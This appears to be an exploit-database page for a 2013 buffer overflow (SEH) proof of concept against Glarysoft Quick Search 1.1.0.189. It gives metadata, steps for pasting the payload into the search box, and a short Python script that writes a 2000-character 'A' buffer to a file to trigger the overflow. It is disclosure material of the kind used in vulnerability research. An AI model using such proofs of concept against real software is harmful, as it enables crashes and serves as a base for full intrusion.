Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)

vendor:

Quick Search

by:

ariarat

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Quick Search

Affected Version From: 1.1.0.189

Affected Version To: 1.1.0.189

Patch Exists: NO

Related CWE: N/A

CPE: a:glarysoft:quick_search:1.1.0.189

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 & Windows XP SP2, SP3

2013

Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)

After creating a txt file, open the created file and copy the AAA... string to clipboard and then paste it in the Search section. For better results, bring the program in Full Mode and in the Edit menu choose Match Path and then paste the string.

Mitigation:

Ensure that user input is properly validated and sanitized.

Source

Exploit-DB raw data:

# Exploit Title: Quick Search Version 1.1.0.189 Buffer Overflow vulnerability(SEH)
# Date: 14-05-2013
# Exploit Author: ariarat 
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: http://download.glarysoft.com/qsearchsetup.exe
# Version: 1.1.0.189 
# Tested on: [ Windows 7 & windows XP sp2,sp3]
#============================================================================================
# After creating txt file,open created file and copy the AAA... string to clipboard and
# then paste in Search section.for better results bring program in Full Mode and in Edit 
# menu choose Match Path and then paste your string.   
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

filename="string.txt"
buffer = "\x41" * 2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()